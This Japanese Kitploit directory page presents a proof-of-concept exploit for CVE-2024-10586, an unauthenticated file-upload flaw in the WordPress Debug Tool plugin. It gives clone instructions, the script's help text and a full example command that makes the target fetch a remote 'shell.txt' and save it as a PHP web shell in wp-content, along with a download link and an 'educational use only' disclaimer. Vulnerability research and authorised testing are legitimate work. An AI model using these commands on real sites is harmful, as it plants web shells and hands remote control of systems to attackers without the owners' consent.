Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10586-Poc — CVE-2024-10586の概念実証エクスプロイト。WordPress Debug Toolプラグインを標的とします。認証されていないPOSTリクエストによる任意のファイルアップロードを自動化し、リモートコード実行につなげます。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-10586-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

CVE-2024-10586の概念実証エクスプロイト。WordPress Debug Toolプラグインを標的とします。認証されていないPOSTリクエストによる任意のファイルアップロードを自動化し、リモートコード実行につなげます。

リポジトリを見る
121年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性情報

説明 WordPress用Debug Toolプラグインは、dbt_pull_image()関数のケイパビリティチェックの欠如とファイルタイプ検証の欠如により、バージョン2.2までの全バージョンにおいて任意のファイル作成に対して脆弱です。
これにより、認証されていない攻撃者がリモートコード実行に悪用可能な.phpファイルなどの任意のファイルを作成できる可能性があります。

CVE ID

CVE-2024-10586

スクリプトの使用方法

前提条件

  • システムにPython 3.xがインストールされていること。
  • 必要な依存関係をインストールします: pip install requests

実行方法

  1. GitHub からリポジトリをクローンします:
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  1. 次のコマンドでスクリプトを実行します: python CVE-2024-10586.py -u -r -p

    パラメータ

  • -u, --url: WordPressサイトのベースURL(例: http://example.com/wordpress)。
  • -r, --remote: ペイロードソースとして使用されるリモートファイルのURL。
  • -p, --path: 任意。シェルが保存されるパス。デフォルトは /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php。

コマンド例

python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

使用例

python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the WordPress site.
  -r REMOTE, --remote REMOTE
                        The remote URL to use in the 'source' parameter.
  -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

免責事項

このスクリプトは教育目的のみを意図しています。責任を持って使用し、所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。作者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。

ツールをダウンロード